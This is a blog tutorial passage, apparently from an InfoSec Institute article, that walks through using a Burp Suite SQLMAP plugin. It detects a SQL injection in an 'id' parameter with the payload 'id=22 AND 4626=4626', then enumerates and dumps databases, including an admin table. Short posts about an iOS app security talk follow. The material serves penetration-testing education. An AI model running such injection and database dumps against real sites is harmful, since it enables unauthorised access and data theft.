Once we have configured SQLMAP, click "RUN"; this opens a new tab that executes the program with the configuration you have given to the wrapper. We can run any number of simultaneous execution tabs with different instances. The image below shows the output tab.

Sqlmap output

Bored with theory? Now let's see an example. The URL below is a vulnerable site for practicing SQLi. You can also find SQLi practice URLs by googling.

http://192.168.2.3/news-and-events.php?id=22

The id parameter in the above URL is vulnerable to SQLi; let's find it out through our SQLMAP wrapper (Burp suite plug-in).

Open the URL in the browser for which the proxy has been configured. In the proxy (Burp) go to the "Site map", click on the URL and send it to sqlmap by right-clicking on the request, as I mentioned previously. The figure below shows the wrapper opened for the above mentioned URL.

sqlmap plugin settings

Target specifies the URL we are testing; Cookie specifies the cookie or session id. The wrapper automatically identifies the positions in the URL where SQLi can be injected and lists them in the "Parameters to test" text area (in our case there is only one possible injection point, the "id" parameter).

In this example I have configured the SQLMAP wrapper to enumerate the list of databases that are configured in the backend database.

burp plugin sqlmap output

The figure above shows the output tab, which displays how the plug-in tried to exploit the SQLi vulnerability in different ways.

We can see that initially the wrapper tried to exploit the vulnerability using "Boolean-based blind SQLi" with the AND operator. The payload shows how the tool tried to exploit the vulnerability. Here we can see the payload id=22 AND 4626=4626, which is equivalent to the following URL:

http://192.168.2.3/news-and-events.php?id=22 AND 4626=4626

As the condition is always true, the above URL returns the same page as the original URL.

In the second trial it tried "error-based SQLi", and later the UNION operator.

Retreive database with sqlmap

From the figure above we can observe more server details like the web server, operating system and back-end DBMS.

“Information_schema”  and “nilakantatrust” are the two databases that are used by the web application.

Now let us try to enumerate all the tables and the columns of the tables from the above databases. To do so, set the SQLMAP wrapper Action field to "Enumerate database tables and columns". The figure below shows this.

extract tables and columns using sqlmap

The figure below shows the tables of the database "nilakantatrust".

extracted tables and columns

Let us see the columns of these tables. The figure below shows the columns and their data types for two tables, "est_notice" and "est_news", of the nilakantatrust database.

columns retreived using sqlmap

We can also dump the complete database by selecting the option "dump dbms databases", and store all the data into a file by using the option "save to file" in the output tab.

sqlmap output to file

The figure above shows the dumped data of the table "est_admin" from the "nilakantatrust" database being stored into a file.

Conclusion:

SQLMAP is a powerful tool which automates the process of detecting and exploiting SQLi.

I have written this article for InfoSec Institute. Take a look at the web application security course offered by InfoSec Institute.

 

Posted by kamalb

 

Hacking and Securing iOS Applications : Video

13 Dec
 
 

Hacking and Securing iOS Applications : Slides

03 Dec

The deck of slides which I used for my presentation at Clubhack 2012, India.

Abstract
iOS applications share a common set of classes and depend heavily on the operating system's solutions for data communication, storage and encryption. Depending solely on Apple's implementation makes them less complex, but it affects the security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sandboxing and Data Protection, all of them are subject to attack. Relying only on iOS security could lead to the loss of the sensitive data stored within the application once iOS itself is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating one's own code that works better.

The presentation illustrates several types of iOS application attacks such as run-time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain and Data Protection API and explains the techniques used to circumvent them. The presentation provides guidelines and suggests best practices for secure iOS application development.

Slides

 

Demo Videos
I want to thank my friend TC for helping me develop a couple of apps for the demos.

 

 

 

 

 
 